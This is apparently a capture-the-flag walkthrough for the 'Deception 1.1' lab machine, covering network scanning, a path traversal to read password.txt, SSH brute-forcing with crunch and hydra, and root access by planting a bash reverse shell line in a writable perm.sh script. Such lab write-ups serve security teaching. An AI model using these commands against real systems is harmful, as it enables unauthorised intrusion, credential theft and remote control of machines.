Description
This machine is the next part of Deception machine. This time try harder to get root!
To complete this challenge you need to find 3 flags.
flag 2 : Password to unzip the zip file.
flag 1 : Present in /home/yash/
flag 0 : Present in /root/
This is a beginner/intermediate level machine.
Step 1:-
I found “646563657074696f6e312e31” this while creating the machine .
this value is actually encrypted value in HEX
FLAG 2: Password to unzip the file, “deception1.1”
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16
As we saw in netdiscover result. Our target ip address is 10.10.10.18.
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
$ nmap -p- -sV 10.10.10.18
nmap result reveals that two ports are open on target machine. port 80 which is http (web) and port 22 (ssh)
let’s visit port 80 quickly.
A password strength Checker..!!!!
okay let’s check dark0:dark0222@@@S.
i think there is something juicy in this 0000flagflagflagflag.php. okay..!!! let’s continue.
UMMMM…!!!! Password is strong… that’s cool. but “flag=1”
hey, 0000flagflagflagflag.php and “flag=1”
I replaced all flag with 1, and look what we found.
http://10.10.10.18/00001111.php
let’s view the source code of the same view-source:http://10.10.10.18/00001111.php
okay, now one thing is clear that we have to find a file name “password.txt” and we have to use “?page=” for finding password.txt
tried for 00001111.php?page=password.txt but didnt worked so tried for more ../password.txt , ../../password.txt and finally it worked.
here we got a username and first four words from password of 6 words and we have to find the last two words. here, we can use crunch for make password wordlist.
$ crunch 6 6 -t ya5h@@ -o wordlist.txt
let’s now brute force ssh using my favorite tool “hydra”
$ hydra -l yash -P wordlist.txt ssh://10.10.10.18
luckily, we found the user credentials
Username :- yash
Password :- ya5hay
$ ssh yash@10.10.10.18
here, we have our flag0.txt
L3lhc2hhbmlzaC5waHA=
Way to root…!!!
we have a .sh file perm.sh, let’s inject our reverse shell for getting root shell…!
we can add any reverse shell like python or bash or any other. i’m using bash revershell
$ vi perm.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.10.1/1234 0>&1
and editing this the .sh file turn on listener and wait for the connection of root…..!!!!!
That’s it..!! Thanks for reading. Stay tuned for similar walkthrough and much more than this.
:- Dark-0
